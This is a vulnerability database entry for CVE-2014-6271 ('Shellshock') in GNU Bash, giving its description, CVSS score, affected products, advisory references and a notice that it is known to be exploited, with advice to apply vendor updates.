CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
CVSS Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Products (334)
| Vendor | Product | Version |
|---|---|---|
| gnu | bash | * |
| arista | eos | * ≥ 4.9.0 < 4.9.12 |
| arista | eos | * ≥ 4.10.0 < 4.10.9 |
| arista | eos | * ≥ 4.11.0 < 4.11.11 |
| arista | eos | * ≥ 4.12.0 < 4.12.9 |
| arista | eos | * ≥ 4.13.0 < 4.13.9 |
| arista | eos | * ≥ 4.14.0 < 4.14.4f |
| oracle | linux | 4 |
| oracle | linux | 5 |
| oracle | linux | 6 |
| qnap | qts | * < 4.1.1 |
| qnap | qts | 4.1.1 |
| qnap | qts | 4.1.1 |
| mageia | mageia | 3.0 |
| mageia | mageia | 4.0 |
| redhat | gluster_storage_server_for_on-premise | 2.1 |
| redhat | virtualization | 3.4 |
| redhat | enterprise_linux | 4.0 |
| redhat | enterprise_linux | 5.0 |
| redhat | enterprise_linux | 6.0 |
…and 314 more
GitHub Security Advisory GHSA-6hfc-grwp-2p9c
GNU Bash through 4.3 processes trailing strings after function definitions in the values of...
References (341)
- http://advisories.mageia.org/MGASA-2014-0388.html Third Party Advisory
- http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html Broken Link, Third Party Advisory
- http://jvn.jp/en/jp/JVN55667175/index.html Vendor Advisory
- http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126 Third Party Advisory, VDB Entry, Vendor Advisory
- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673 Third Party Advisory
- http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html Exploit, Issue Tracking, Third Party Advisory
- http://linux.oracle.com/errata/ELSA-2014-1293.html Third Party Advisory
- http://linux.oracle.com/errata/ELSA-2014-1294.html Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html Mailing List, Third Party Advisory
- http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html Mailing List, Third Party Advisory
Risk Scores
Top 0% most likely to be exploited
CISA Known Exploited
Apply updates per vendor instructions.